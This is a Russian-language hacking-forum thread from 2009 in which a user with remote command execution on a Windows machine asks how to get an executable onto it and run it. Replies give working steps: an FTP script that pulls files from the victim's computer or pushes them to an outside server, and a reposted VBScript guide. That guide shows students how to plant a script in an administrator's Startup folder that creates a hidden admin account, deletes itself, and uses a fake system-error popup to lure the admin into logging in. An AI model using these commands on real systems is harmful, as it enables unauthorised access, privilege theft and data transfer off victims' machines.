ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Есть удалённый cmd.. Как подняться?
  #1  
Старый 08.06.2009, 23:01
Аватар для ANONIM123
ANONIM123
Познающий
Регистрация: 14.01.2008
Сообщений: 38
Провел на форуме:
31731

Репутация: -11
По умолчанию Есть удалённый cmd.. Как подняться?

Вобщем есть возможность выполнения cmd на удалённой машине, под виндой.. распишите пожалуйста как допустим закачать и запустить exe файл?
 
Ответить с цитированием

  #2  
Старый 08.06.2009, 23:10
Аватар для AFoST
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194

Репутация: 1934


Отправить сообщение для AFoST с помощью ICQ
По умолчанию

открыть папку на запись. записать через сеть. запустить

upd
посмотри команды
net share
cacls
__________________
Появляюсь редко. Важные дела в реале.

Последний раз редактировалось AFoST; 08.06.2009 в 23:13..
 
Ответить с цитированием

  #3  
Старый 08.06.2009, 23:12
Аватар для ANONIM123
ANONIM123
Познающий
Регистрация: 14.01.2008
Сообщений: 38
Провел на форуме:
31731

Репутация: -11
По умолчанию

а по подробнее можно, с технической стороны?)
 
Ответить с цитированием

  #4  
Старый 08.06.2009, 23:18
Аватар для -=lebed=-
-=lebed=-
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287

Репутация: 4738


По умолчанию

ещё вариант:
Поднять у себя ftp-сервер. Запустить на компе-жертве клиента ftp. Законнектится к серверу (open server_nameort) и сделать get file_name.
 
Ответить с цитированием

  #5  
Старый 08.06.2009, 23:37
Аватар для AFoST
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194

Репутация: 1934


Отправить сообщение для AFoST с помощью ICQ
По умолчанию

Цитата:
Сообщение от ANONIM123  
а по подробнее можно, с технической стороны?)
расписать по действиям - неинтересно) лучше сам покопайся - полезнее будет!
__________________
Появляюсь редко. Важные дела в реале.
 
Ответить с цитированием

  #6  
Старый 08.06.2009, 23:41
Аватар для diznt
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

Цитата:
Сообщение от -=lebed=-  
ещё вариант:
Поднять у себя ftp-сервер. Запустить на компе-жертве клиента ftp. Законнектится к серверу (open server_nameort) и сделать get file_name.
Не всегда работает кстати (то есть фтп просто не открывается иногда(у меня лично так было))
 
Ответить с цитированием

  #7  
Старый 09.06.2009, 00:22
Аватар для AARON
AARON
Участник форума
Регистрация: 29.04.2008
Сообщений: 106
Провел на форуме:
647733

Репутация: 46
По умолчанию

фтп должен быть не через пассивный режим.


ftp -s:123.ftp

в 123.ftp пишем:
OPEN ftpserv.ru
user
pass
put C:\porno.zip
bye
 
Ответить с цитированием

  #8  
Старый 09.06.2009, 01:26
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Код:
Прива вам школьники и студенты! Я хочу дать вам несколько полезных советов к началу учебного года. Я более чем уверен, что вас уже достала ваша учетная запись с ограниченными правами на виндах 2k NT или XP и вам хочется больше,  намного больше! В вашем учебном заведении наверняка есть злые дядьки, которых называют админами, и только эти негодяи знают пассы на элитные учетные записи. Просто падонки, не правда ли? Мы это исправим, более того, мы их свергнем, а вы будете новым королём с большими привилегиями.

Итак, что нам для этого нужно? Лишь 5-10 минут провести за нужным нам компом, что бы на нём был хотя бы один текстовый редактор и целый запас желания получить админскую учетку. Весь этот способ основан на WSH, лучшего пожалуй средсвта для компьютерного западла в виндах (смотри ][ 36 выпуск!). Ни для кого не секрет, что админы логятся на тачках со своей учетной записью (да часто с таким гордым видом)... От этого и будем плясать. Сначала нам потребуется написать простой скриптик "Действия I (урвать хоть что-нибудь)".

Sub helo(admin, Wait)
Set WshShell=WScript.CreateObject("WScript.Shell")
X=WshShell.Run(admin,Wait)
End Sub
Call helo("C:\windows\system32\net.exe user xakep 1111 /add", True)
\\\ тут мы добавляем юзера xakep c паролем 1111
Call helo("C:\windows\system32\net.exe localgroup Администраторы xakep /add", True)
\\\ тут наш юзер становится настоящим админом !!! 

и назовем наше творение admin.vbs.

Да всё это просто замечательно, только прав у нас маловато. А вот прав админчика нам как раз хватит, поскольку ключ реестра HKEY_LOCAL_MACHINE нам не доступен у нас не получится заставить грузится этот скрипт у всех юзеров. А зачем нам лишние заморочки, мы будем делать проще, мы просто откроем путь c:\Documents and Settings\Администратор\Главное меню\Программы\Автозагрузка\ и нежно и аккуратно положим туда наш скрипт. Тут возникает другой вопрос - а вдруг админ его заметит... Не заметит, в конце скрипта добавляем следующее:

Set Killer=CreateObject("Scripting.FileSystemObject")
Killer.DeleteFile(" C:\Documents and Settings\Администратор\ Главное меню\Программы\Автозагрузка\ admin.vbs")

(главное помнить, что админ может использовать не встроенную учетную запись "Администратор", а что-нибудь поудобнее, но я вас уверяю, с правами он себя никогда не обделит). И после того, как админ войдёт в систему под своим аккаунтом все дело будет сделано, а как заставить его это сделать я расскажу в конце. Итак, собственный админский аккаунт у нас уже есть, но что мешает настоящему админу его удалить... Это тоже поправимо, делаем следующее.

Заходим в командную строку и набиваем "net localgroup Администраторы" - смотрим кто же у нас имеет права админить, записываем или запоминаем... Действие II ( прощай админ, не поминай лихом). Пишем примерно такой же скрипт ;

Sub helo(admin, Wait)
Set WshShell=WScript.CreateObject("WScript.Shell")
X=WshShell.Run(admin,Wait)
End Sub
Call helo("C:\windows\system32\net.exe user Администратор 1111 /add", True)

Действие III (админ иди работай)

Теперь как же быть с толстыми и ленивыми админами, которым влом хотя бы раз в неделю проверить комп? Их придётся заставить тащить свою задницу к тачке и логинится адинской записью. Надо так надо... К примеру пусть выскакивает мессага о какой-нибудь злой ошибке (это я полностью украду из их журнала выпуска 36) - тоже небольшой скриптик,  который мы поместим в реестре на этот раз:

Hacker = MsgBox("тут вы впишите чтонибудь заумное и страшное например "Explorer.exe не может получить доступ к памяти 0x77e626ba", 20, "System error")
(с) не моё
 
Ответить с цитированием

  #9  
Старый 09.06.2009, 12:19
Аватар для ANONIM123
ANONIM123
Познающий
Регистрация: 14.01.2008
Сообщений: 38
Провел на форуме:
31731

Репутация: -11
По умолчанию

а одной строкой можно сделать?
 
Ответить с цитированием

  #10  
Старый 09.06.2009, 21:16
Аватар для SEWERN
SEWERN
Участник форума
Регистрация: 09.01.2009
Сообщений: 155
Провел на форуме:
2253612

Репутация: 94
По умолчанию

залей радмина , а потом сделай с него дед)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
F.A.Q по Пранку Nightmarе Статьи 43 28.03.2010 10:55
Мой ржачный разговор в аське с кем-то вроде как с античата, как я подумал Дрэгги Болталка 21 22.07.2007 12:33
Статья: Атака на Wi-Fi silveran Аппаратное обеспечение 1 15.04.2006 16:27



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ